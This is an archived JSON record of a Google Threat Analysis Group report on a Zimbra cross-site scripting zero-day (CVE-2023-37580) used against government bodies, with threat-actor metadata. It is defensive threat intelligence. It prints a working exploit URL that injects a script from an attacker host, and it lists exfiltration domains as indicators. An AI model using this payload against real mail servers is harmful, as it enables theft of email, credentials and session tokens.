{
	"id": "915a3a78-55b2-4405-a31e-a32348768b41",
	"created_at": "2026-04-06T00:10:27.309536Z",
	"updated_at": "2026-04-10T03:30:21.376826Z",
	"deleted_at": null,
	"sha1_hash": "8ad7f86bd03647b6fbcc235828f1d796061bdb98",
	"title": "Zimbra 0-day used to target international government organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 180811,
	"plain_text": "Zimbra 0-day used to target international government organizations\nBy Clement Lecigne\nPublished: 2023-11-16 · Archived: 2026-04-05 22:29:29 UTC\nNov 16, 2023\nClement Lecigne\nThreat Analysis Group\nMaddie Stone\nThreat Analysis Group\nIn June 2023, Google’s Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra Collaboration, an email server many organizations use to host their email. Since discovering the 0-day, now patched as CVE-2023-37580, TAG has observed four different groups exploiting the same bug to steal email data, user credentials, and authentication tokens. Most of this activity occurred after the initial fix became public on GitHub. To ensure protection against these types of exploits, TAG urges users and organizations to keep software fully up-to-date and apply security updates as soon as they become available.\n0-day discovery, hotfix and patch\nTAG first discovered the 0-day, a reflected cross-site scripting (XSS) vulnerability, in June when it was actively exploited in targeted attacks against Zimbra’s email server. Zimbra pushed a hotfix to their public GitHub on July 5, 2023 and published an initial advisory with remediation guidance on July 13, 2023. They patched the vulnerability as CVE-2023-37580 on July 25, 2023.\nTAG observed three threat groups exploiting the vulnerability prior to the release of the official patch, including groups that may have learned about the bug after the fix was initially made public on GitHub. TAG discovered a fourth campaign using the XSS vulnerability after the official patch was released. Three of these campaigns began after the hotfix was initially made public, highlighting the importance of organizations applying fixes as quickly as possible.\nThe Vulnerability CVE-2023-37580\nCVE-2023-37580 is a reflected cross-site scripting (XSS) vulnerability. XSS is a web application vulnerability that allows malicious scripts to be injected into another website. In this case, there was a vulnerability in Zimbra that injected the parameter within the URL directly into the webpage, causing the script to be executed. An example that could trigger the XSS is:\nhttps://mail.REDACTED[.]com/m/momoveto?st=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyM\nwhich decodes to:\nhttps://mail.REDACTED[.]com/m/momoveto?st=acg\"/><script src=\"https://obsorth.opwtjnpoc[.]ml/pQyM\nThe fix was to escape the contents of the st parameter before it was set as the value in an HTML object.\nCampaign 1: First known exploitation leads to email-stealing framework\nThe initial in-the-wild discovery of the 0-day vulnerability was a campaign targeting a government organization in Greece. The attackers sent emails containing exploit URLs to their targets. If a target clicked the link during a logged-in Zimbra session, the URL loaded the same framework that Volexity documented in February 2022. This framework uses the XSS to steal users’ mail data, such as emails and attachments, and to set up an auto-forwarding rule to an attacker-controlled email address. The framework was loaded from:\nhttps://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js\nCampaign 2: Winter Vivern exploitation after hotfix pushed to GitHub\nThe patch for the vulnerability was pushed to GitHub on July 5. Another actor exploited the vulnerability for a full two weeks beginning on July 11 before the official patch became available on July 25. TAG identified multiple exploit URLs that targeted government organizations in Moldova and Tunisia; each URL contained a unique official email address for specific organizations in those governments. TAG attributes this activity to Winter Vivern (UNC4907), an APT group known to exploit XSS in Zimbra and Roundcube. The vulnerability was used to load scripts at:\nhttps://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js\nhttps://applicationdevsoc[.]com/tndgt/auth.js\nCampaign 3: Exploit used for credential phishing\nDays before Zimbra pushed their official patch on July 25, TAG observed a third, unidentified group exploiting the vulnerability as part of a campaign that phished for credentials belonging to a government organization in Vietnam. In this case, the exploit URL pointed to a script that displayed a phishing page for users’ webmail credentials and posted stolen credentials to a URL hosted on an official government domain that the attackers likely compromised.\nCampaign 4: N-day exploit used for stealing authentication token\nIn August 2023, after the patch for CVE-2023-37580 was released, TAG discovered a fourth campaign using the vulnerability against a government organization in Pakistan. The exploit was used to steal the Zimbra authentication token. The token was exfiltrated to ntcpk[.]org.\nConclusion\nThe discovery of at least four campaigns exploiting CVE-2023-37580, three campaigns after the bug first became public, demonstrates the importance of organizations applying fixes to their mail servers as soon as possible. These campaigns also highlight how attackers monitor open-source repositories to opportunistically exploit vulnerabilities where the fix is in the repository, but not yet released to users. The actors behind Campaign #2 began exploiting the bug after the fix was pushed to GitHub, but before Zimbra publicly released the advisory with remediation advice.\nThe exploitation of CVE-2023-37580 comes on the heels of CVE-2022-24682, another reflected XSS vulnerability in Zimbra mail servers that was actively exploited in the wild in 2022, and was followed by the exploitation of CVE-2023-5631, an XSS vulnerability in Roundcube mail servers, just this past month. The regular exploitation of XSS vulnerabilities in mail servers also shows a need for further code auditing of these applications, especially for XSS vulnerabilities.\nWe’d like to acknowledge Zimbra for their response and patching of this vulnerability. Following our disclosure policy, TAG shares its research to raise awareness and advance security across the ecosystem. We also add all identified websites and domains to Safe Browsing to safeguard users from further exploitation. We urge users and organizations to apply patches quickly and keep software fully up-to-date for their protection. TAG will remain focused on detecting, analyzing, and preventing 0-day exploitation as well as reporting vulnerabilities to vendors immediately upon discovery.\nIndicators of compromise (IoCs)\nhttps://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js\nhttps://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js\nhttps://applicationdevsoc[.]com/tndgt/auth.js\nntcpk[.]org\nThanks to TAG's Kristen Dennesen who also contributed to this report.\nSource: https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/"
	],
	"report_names": [
		"zimbra-0-day-used-to-target-international-government-organizations"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434227,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8ad7f86bd03647b6fbcc235828f1d796061bdb98.pdf",
		"text": "https://archive.orkl.eu/8ad7f86bd03647b6fbcc235828f1d796061bdb98.txt",
		"img": "https://archive.orkl.eu/8ad7f86bd03647b6fbcc235828f1d796061bdb98.jpg"
	}
}